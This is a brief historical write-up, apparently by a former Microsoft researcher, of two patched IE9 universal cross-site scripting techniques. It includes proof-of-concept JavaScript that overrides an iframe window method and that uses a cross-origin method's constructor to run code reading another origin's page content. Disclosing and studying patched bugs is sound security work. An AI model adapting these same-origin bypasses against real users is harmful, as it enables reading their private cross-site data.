IE9 UXSS: Overriding Window Methods or Getting Function via Constructor

Two related techniques for reading cross-origin document content in IE9. The first overrode a method on a cross-origin IFrame’s window before the victim page called it; the second obtained a live Function constructor from a cross-origin method reference and used it to execute code in that context.

Method 1 — Override a Cross-Origin Window Method

// Override focus on the IFrame's window — same origin required first
iFrMethods.focus = function() {
    alert(document.URL); // Runs in the IFrame's context
};

Method 2 — Get Function Constructor from a Cross-Origin Method

var xFunction = iFrGoogle.focus.constructor;
xFunction(
    "alert(location + '\\n\\n' + document.body.innerText)"
)();

Method 2 did not require same-origin setup. iFrGoogle.focus was accessible cross-origin (it was a window method), and its .constructor property resolved to the Function constructor of the IFrame’s script engine. Calling that constructor created a function that executed in the Google IFrame’s context, reading its page content.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 RCE: Intercepting Internal Dialogs via Object.defineProperty] :: [IE9 UXSS: Getting Function Constructor from a Cached location.replace] >